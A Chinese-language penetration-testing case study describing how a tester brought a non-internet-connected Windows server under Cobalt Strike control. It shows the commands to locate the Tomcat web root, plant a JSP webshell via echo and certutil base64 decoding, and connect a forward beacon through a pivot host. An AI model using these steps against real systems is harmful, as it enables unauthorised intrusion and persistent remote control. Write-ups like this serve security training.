一次不出網上線cs實戰案例
VSole2022-07-26 08:58:11
場景
shiro打點獲取10段服務器權限,在10段機器出網且已上線cs;172段不出網且反向不通10段,已通過mysql弱口令獲取system權限,存在web服務。
上線過程
思路:寫入webshell,通過正向馬上線cs。
getshell
通過web服務獲取一個web目錄下的文件名:stf-login-bg.jpg

獲取所有盤符
wmic logicaldisk get caption,name

通過文件名獲取web目錄
dir /a /s /b d:\"stf-login-bg.jpg"

根據圖片URL確定D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\stf-login-bg.jpg為真實web路徑,使用\可dir到此路徑。

echo配合certutil寫入webshell:
//base64編碼shell.jsp certutil -encode shell.jsp jsp.txt //echo編碼后的內容到web目錄 echo xxxx >D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt //解碼還原文件 certutil -decode D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\123.jsp


上線cs
新建監聽器

生成正向馬


通過webshell上傳到目標機器并執行,使用跳板機連接,上線cs。
connect 172.20.57.122 28888

文章來源:tide安全團隊
VSole
網絡安全專家